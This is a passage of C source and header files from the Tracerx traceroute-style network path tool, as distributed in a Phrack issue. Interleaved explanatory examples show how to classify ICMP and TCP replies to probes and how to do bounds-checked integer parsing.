* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_error.h"

void
tx_error(int severity, char *msg, ...)
{
    va_list ap;
    char buf[BUFSIZ];

    va_start(ap, msg);
    vsnprintf(buf, sizeof(buf) - 1, msg, ap);
    va_end(ap);

    switch (severity)
    {
        case WARNING:
            fprintf(stderr, "Warning: ");
            break;
        case CRITICAL:
            fprintf(stderr, "Critical: ");
            break;
        case FATAL:
            fprintf(stderr, "Fatal: ");
            break;
    }
    fprintf(stderr, "%s", buf);

    if (severity == FATAL)
    {
        exit(EXIT_FAILURE);
    }
}

/* EOF */
<-->
<++> P55/Tracerx/tx_framework.h !4bc795bb
/*
* $Id: tx_framework.h,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
*
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_TRACERX_H
#define _TX_TRACERX_H
#define TX_STATIC_PORTS 0x1
#define PACKET_MIN (IP_H + UDP_H + TX_P) /* min packet size (parenthesized so it
                                          * survives use inside an expression) */
#define PACKET_MAX 1500                  /* max packet size */
#define BURST_RATE_MAX 30                /* max burst rate */
#define IP_TTL_MAX 255                   /* max IP TTL */
#define PORT_MAX 65535                   /* max port */
#define PROBE_MAX 100                    /* max probe count per round */
#define WAIT_MAX 360                     /* max time to wait for responses */
#define PCAP_BUFSIZ 576                  /* bytes per packet we can capture */
int
tx_init_control(
struct tx_control **
);
int
tx_init_network(
struct tx_control **,
char *
);
int
tx_do_scan(
struct tx_control **
);
int
tx_shutdown(
struct tx_control **
);
#endif /* _TX_TRACERX_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_build.h !6de4be5c
/*
* $Id: tx_packet_build.h,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* High-level packet construction routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_BUILD_H
#define _TX_PACKET_BUILD_H
int
tx_packet_build_probe(
struct tx_control **
);
int
tx_packet_build_payload(
struct tx_control **,
int
);
int
tx_packet_build_udp(
struct tx_control **
);
int
tx_packet_build_tcp(
struct tx_control **
);
int
tx_packet_build_icmp(
struct tx_control **
);
int
tx_packet_update_probe(
struct tx_control **
);
#endif /* _TX_PACKET_BUILD_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_inject.h !9b8fc656
/*
* $Id: tx_packet_inject.h,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* High-level packet injection routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_INJECT_H
#define _TX_PACKET_INJECT_H
int
tx_packet_inject(
struct tx_control **
);
#endif /* _TX_PACKET_INJECT_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_verify.h !a40d5aef
/*
* $Id$
*
* Tracerx
* packet verification routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_VERIFY_H
#define _TX_PACKET_VERIFY_H
int
tx_packet_verify_udp(
char *,
struct tx_control **
);
int
tx_packet_verify_tcp(
char *,
struct tx_control **
);
int
tx_packet_verify_icmp(
char *,
struct tx_control **
);
#endif /* _TX_PACKET_VERIFY_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_filter.h !f4dbb92f
/*
* $Id: tx_packet_filter.h,v 1.1 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* packet filtering routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_FILTER_H
#define _TX_PACKET_FILTER_H
/*
 * Since we are not putting the interface into promiscuous mode, the only
 * packets we see are those addressed to this host, which keeps the filter
 * language simple. For each scan type, we of course need to receive
 * ICMP TTL expired in transit type messages (ICMP type 11).
 * For UDP, our terminal packet is an unreachable (ICMP type 3).
 * For TCP, our terminal packet is a TCP RST (or an RST/ACK).
 * For ICMP, our terminal packet is an ICMP echo reply.
 * However, for the last two, we need to be prepared for unreachables as
 * network conditions are unpredictable.
 * The filter does not check that an ICMP error actually quotes one of our
 * probes, so unrelated ICMP traffic (or another process's traceroute) still
 * gets through; weeding that out is the job of the tx_packet_verify_* routines.
 * TCP flags live in byte 13 of the TCP header (byte 14 is the window size):
 * 0x12 is SYN/ACK, 0x04 is RST and 0x14 is RST/ACK.
 */
#define TX_BPF_FILTER_UDP "icmp[0] == 11 or icmp[0] == 3"
#define TX_BPF_FILTER_TCP "icmp[0] == 11 or icmp[0] == 3 or tcp[13] == 0x12 \
or tcp[13] == 0x4 or tcp[13] == 0x14"
#define TX_BPF_FILTER_ICMP "icmp[0] == 11 or icmp[0] == 3 or icmp[0] == 0"
int
tx_set_pcap_filter(
char *, /* filter code to install */
struct tx_control **
);
#endif /* _TX_PACKET_FILTER_H */
/* EOF */
<-->
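The filters in tx_packet_filter.h only decide which packets pcap hands back; the receiving side still has to work out what each one means for the trace and whether it even belongs to this scan. The following is an added example written for this page, not Tracerx's own tx_packet_snatcher or tx_packet_verify_* code: it classifies a raw IPv4 packet into the TX_PACKET_IS_* classes from tx_packet_capture.h for a UDP, TCP or ICMP scan, and for ICMP errors checks that the quoted datagram is one of our probes. Header offsets follow RFC 791/792/793; identifying a probe by its destination host and source port is an assumption made here for illustration, as are the constructed sample packets and the 192.0.2.10 / 198.51.100.7 / 10.0.0.1 addresses.

```c
/*
 * Added example, not Tracerx code: classify a captured IPv4 packet into the
 * tx_packet_capture.h classes and confirm that an ICMP error quotes one of
 * our probes.  Matching a probe by (destination host, source port) is an
 * assumption made for this example, not Tracerx's own rule.
 */
#include <stddef.h>
#include <stdint.h>

#define TX_PACKET_IS_BORING           0
#define TX_PACKET_IS_EXPIRED          1
#define TX_PACKET_IS_TERMINAL         2
#define TX_PACKET_IS_TERMINAL_EXOTIC  3
#define TX_PACKET_IS_UNREACH_EN_ROUTE 4
enum { PROTO_ICMP = 1, PROTO_TCP = 6, PROTO_UDP = 17 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }

/* IPv4 header length in bytes; 0 if the buffer is truncated or not IPv4 */
static size_t ip_hlen(const uint8_t *p, size_t len)
{
    size_t hl = (len >= 20 && (p[0] >> 4) == 4) ? (size_t)(p[0] & 0x0f) * 4 : 0;
    return (hl < 20 || hl > len) ? 0 : hl;
}

/*
 * Is the datagram quoted inside an ICMP error one of ours?  RFC 792 only
 * guarantees the inner IP header plus 8 bytes, which for UDP and TCP is just
 * the port pair, so nothing past that (such as a tx_payload) is relied on.
 */
static int quoted_is_ours(const uint8_t *q, size_t len, int proto,
                          uint16_t our_sport, uint32_t our_host)
{
    size_t hl = ip_hlen(q, len);
    if (hl == 0 || len < hl + 8) return 0;   /* fewer than IP + 8 bytes quoted */
    if (q[9] != proto) return 0;             /* inner protocol */
    if (rd32(q + 16) != our_host) return 0;  /* inner destination address */
    return rd16(q + hl) == our_sport;        /* inner source port */
}

/* Returns one of the TX_PACKET_IS_* classes for a packet seen during a scan */
int tx_classify(const uint8_t *pkt, size_t len, int proto,
                uint16_t our_sport, uint32_t our_host)
{
    size_t hl = ip_hlen(pkt, len);
    const uint8_t *l4;

    if (hl == 0 || len < hl + 8) return TX_PACKET_IS_BORING;
    l4 = pkt + hl;
    if (pkt[9] == PROTO_ICMP) {
        if (l4[0] == 11 || l4[0] == 3) {     /* time exceeded / unreachable */
            /* the quoted datagram starts 8 bytes into the ICMP message */
            if (!quoted_is_ours(l4 + 8, len - hl - 8, proto, our_sport, our_host))
                return TX_PACKET_IS_BORING;
            if (l4[0] == 11) return TX_PACKET_IS_EXPIRED;
            /* port unreachable (code 3) ends a UDP trace; other codes are en route */
            return (proto == PROTO_UDP && l4[1] == 3) ? TX_PACKET_IS_TERMINAL
                                                       : TX_PACKET_IS_UNREACH_EN_ROUTE;
        }
        /* an echo reply from the target ends an ICMP trace */
        if (proto == PROTO_ICMP && l4[0] == 0 && rd32(pkt + 12) == our_host)
            return TX_PACKET_IS_TERMINAL;
        return TX_PACKET_IS_BORING;
    }
    if (pkt[9] == PROTO_TCP && proto == PROTO_TCP && len >= hl + 20
        && rd32(pkt + 12) == our_host && rd16(l4 + 2) == our_sport) {
        uint8_t flags = l4[13] & 0x3f;      /* flags are TCP byte 13; 14-15 are the window */
        if (flags == 0x04 || flags == 0x14) return TX_PACKET_IS_TERMINAL;  /* RST, RST/ACK */
        if (flags == 0x12) return TX_PACKET_IS_TERMINAL_EXOTIC;            /* SYN/ACK */
    }
    return TX_PACKET_IS_BORING;
}

/* Constructed samples (not real captures): our probes go 192.0.2.10:33000 -> 198.51.100.7 */
#define OUR_SPORT 33000u
#define OUR_HOST  0xC6336407u   /* 198.51.100.7 */
/* ICMP time exceeded from router 10.0.0.1 quoting our UDP probe (inner TTL 1) */
static const uint8_t sample_expired[] = {
    0x45,0,0,0x38, 0,0,0,0, 64,1,0,0, 10,0,0,1, 192,0,2,10,
    11,0,0,0, 0,0,0,0,
    0x45,0,0,0x28, 0x12,0x34,0,0, 1,17,0,0, 192,0,2,10, 198,51,100,7,
    0x80,0xe8, 0x82,0x9a, 0,20, 0,0 };
/* Same error, but the quoted probe came from port 33001: someone else's */
static const uint8_t sample_foreign[] = {
    0x45,0,0,0x38, 0,0,0,0, 64,1,0,0, 10,0,0,1, 192,0,2,10,
    11,0,0,0, 0,0,0,0,
    0x45,0,0,0x28, 0x12,0x34,0,0, 1,17,0,0, 192,0,2,10, 198,51,100,7,
    0x80,0xe9, 0x82,0x9a, 0,20, 0,0 };
/* TCP RST/ACK from 198.51.100.7:80 back to our source port: terminal */
static const uint8_t sample_rst[] = {
    0x45,0,0,0x28, 0,0,0,0, 64,6,0,0, 198,51,100,7, 192,0,2,10,
    0,80, 0x80,0xe8, 0,0,0,0, 0,0,0,1, 0x50,0x14, 0,0, 0,0,0,0 };
/* Plain ACK with window 0x1200: byte 14 is 0x12, but the flags byte is 0x10 */
static const uint8_t sample_ack_win[] = {
    0x45,0,0,0x28, 0,0,0,0, 64,6,0,0, 198,51,100,7, 192,0,2,10,
    0,80, 0x80,0xe8, 0,0,0,0, 0,0,0,1, 0x50,0x10, 0x12,0, 0,0,0,0 };
```

The two TCP samples differ only in which byte holds 0x12: `sample_rst` is recognised as the end of the trace, while `sample_ack_win` is discarded even though its window field happens to contain the SYN/ACK value, which is exactly the distinction a filter written against the wrong offset would get backwards. The foreign sample shows why the quoted datagram must be inspected: the outer packet is indistinguishable from a legitimate hop reply until the inner source port is compared.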
<++> P55/Tracerx/tx_packet_capture.h !be216cbf
/*
* $Id: tx_packet_capture.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* High-level packet capture routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_CAPTURE_H
#define _TX_PACKET_CAPTURE_H
#define TX_PACKET_IS_BORING 0
#define TX_PACKET_IS_EXPIRED 1
#define TX_PACKET_IS_TERMINAL 2
#define TX_PACKET_IS_TERMINAL_EXOTIC 3
#define TX_PACKET_IS_UNREACH_EN_ROUTE 4
int
tx_packet_snatcher(
struct tx_control **
);
#endif /* _TX_PACKET_CAPTURE_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_main.h !1526759a
/*
* $Id: tx_main.h,v 1.2 1999/05/29 20:28:42 route Exp $
*
* TracerX
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _MAIN_H
#define _MAIN_H
#include <stdarg.h>
#include <pcap.h>
#include <libnet.h>
#define BANNER "TracerX (c) 1999 Mike D. Schiffman <mike@infonexus.com> and \
Jeremy F. Rauch\n<jrauch@cadre.org>. Distribution is unlimited provided due \
credit is given and no fee is charged.\n\nhttp://www.packetfactory.net/tracerx \
for more information.\n"
void
usage(
char *
);
#endif /* _MAIN_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_report.h !05ed6ef4
/*
* $Id$
*
* Tracerx
* Report generation routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_REPORT_H
#define _TX_REPORT_H
#include "./tx_struct.h"
void
tx_report(
int, /* The class of packet we are reporting on */
u_char *, /* The packet to report */
struct tx_control ** /* u know this one */
);
#endif /* _TX_REPORT_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_util.h !928f1bf7
/*
* $Id: tx_util.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* Misc routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_UTIL_H
#define _TX_UTIL_H
#include "./tx_struct.h"
/*
* Converts a string into an integer, handling bounding errors.
* Accepts base 10 or base 16 numbers.
* Taken from traceroute and slightly modified.
* Exits with reason upon error.
*/
int /* The converted value */
tx_str2int(
register const char *, /* The string containing the value */
register const char *, /* The title of the value (for errors only) */
register int, /* Minimum value */
register int /* Maximum value */
);
int /* The protocol number */
tc_prot_select(
char *, /* The protocol from the command line */
struct tx_control ** /* U know.. */
);
int /* 1 == ok, -1 == err */
tx_get_hwaddrs(
struct ether_addr **, /* local ethernet addr (to be filled in) */
struct ether_addr **, /* remote ethernet addr (to be filled in) */
struct tx_control **, /* U know.. */
u_char * /* errbuf */
);
#endif /* _TX_UTIL_H */
/* EOF */
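tx_util.h describes tx_str2int only by its contract: decimal or hex input, bounds enforced, exit on error. The function below is an added example written from that description, not Tracerx's or traceroute's own implementation. It accepts decimal or 0x-prefixed hexadecimal, rejects empty input, leading blanks, trailing junk, overflow and anything outside [min, max], and reports failure through its return value rather than exiting so that the edge cases can be exercised; the `title` argument is only used in the diagnostic, as in the original prototype.

```c
/*
 * Added example, not Tracerx code: a bounds-checked string-to-int conversion
 * written from the tx_str2int description in tx_util.h.  Returns a status
 * instead of exiting so the edge cases can be tested.
 */
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* 0 and *out set on success; -1 with a diagnostic on stderr otherwise */
int str2int_checked(const char *s, const char *title, int min, int max, int *out)
{
    const char *digits = s;
    char *end;
    long v;
    int base = 10;

    if (s == NULL || *s == '\0' || isspace((unsigned char)*s)) {
        fprintf(stderr, "%s: missing value\n", title);
        return -1;
    }
    if (s[0] == '0' && (s[1] == 'x' || s[1] == 'X')) {   /* hex only with an explicit prefix */
        base = 16;
        digits = s + 2;
    }
    errno = 0;
    v = strtol(digits, &end, base);
    if (end == digits || *end != '\0') {   /* no digits at all, or junk after them */
        fprintf(stderr, "%s: \"%s\" is not a number\n", title, s);
        return -1;
    }
    if (errno == ERANGE || v < INT_MIN || v > INT_MAX) {
        fprintf(stderr, "%s: \"%s\" does not fit in an int\n", title, s);
        return -1;
    }
    if (v < min || v > max) {
        fprintf(stderr, "%s: %ld out of range [%d, %d]\n", title, v, min, max);
        return -1;
    }
    *out = (int)v;
    return 0;
}

/* Convenience wrapper: the converted value, or `bad` when the string is rejected */
int str2int_or(const char *s, const char *title, int min, int max, int bad)
{
    int v;
    return str2int_checked(s, title, min, max, &v) == 0 ? v : bad;
}
```

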